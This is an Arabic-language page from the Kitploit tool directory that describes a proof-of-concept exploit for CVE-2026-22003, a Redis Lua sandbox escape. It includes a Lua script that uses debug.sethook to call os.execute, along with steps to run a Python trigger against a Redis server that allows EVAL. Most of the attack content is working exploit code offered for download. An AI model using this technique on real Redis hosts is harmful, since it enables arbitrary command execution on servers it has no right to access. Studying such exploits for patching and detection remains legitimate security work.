Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-22003-Redis-Lua-Sandbox-Escape-via-debug.sethook- — استغلال إثبات المفهوم لثغرة CVE-2026-22003 يوضح تجاوز الصندوق الرملي Lua في Redis عبر debug.sethook لتنفيذ أوامر نظام تعسفية. | Kitploit
أدوات/GitHubGitHub/george0papasotiriou/cve-2026-22003-redis-lua-sandbox-escape-via-debug.sethook-
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالأمن قواعد البياناتالهجوم العدائي
GitHubgeorge0papasotiriou/cve-2026-22003-redis-lua-sandbox-escape-via-debug.sethook-

CVE-2026-22003-Redis-Lua-Sandbox-Escape-via-debug.sethook-

استغلال إثبات المفهوم لثغرة CVE-2026-22003 يوضح تجاوز الصندوق الرملي Lua في Redis عبر debug.sethook لتنفيذ أوامر نظام تعسفية.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 16 أياملم تتم المراجعة بعد

CVE-2026-22003 – تجاوز صندوق الرمل Lua في Redis عبر debug.sethook

كود البرنامج (مشغل Lua + Python)

root@kitploit:~
-- redis_sandbox.lua - Script that attempts sandbox escape
local function escape()
  debug.sethook(function() 
    -- This hook runs in a privileged context
    os.execute("id > /tmp/redis_escape") 
  end, "r")
  local a = 1
end
return escape()

CVE-2026-22003 – تجاوز صندوق الرمل Lua في Redis عبر debug.sethook

Severity: Critical

نظرة عامة

لا يقوم صندوق رمل Lua في Redis بتعطيل دالة debug.sethook بشكل صحيح. يمكن للمهاجم الذي يستطيع تشغيل نصوص Lua تركيب خطاف (hook) يعمل في سياق مميز والخروج من صندوق الرمل لتنفيذ أوامر نظام عشوائية.

تفاصيل الثغرة

  • النوع: تجاوز صندوق الرمل (Sandbox Escape)
  • التأثير: تنفيذ عن بُعد للأكواد على مضيف Redis.
  • السبب الجذري: تبقى مكتبة التصحيح (debug) في بيئة Lua متاحة، مما يسمح بتركيب خطافات يمكنها استدعاء os.execute أو دوال مشابهة.

إثبات الاستغلال

  1. ابدأ خادم Redis (بالإعدادات الافتراضية التي تسمح بـ EVAL).
  2. شغّل الاستغلال:
    root@kitploit:~
    pip install redis
    python trigger_redis_sandbox_escape.py
    

The file /tmp/redis_escape is created, proving command execution.

تنزيل الأداة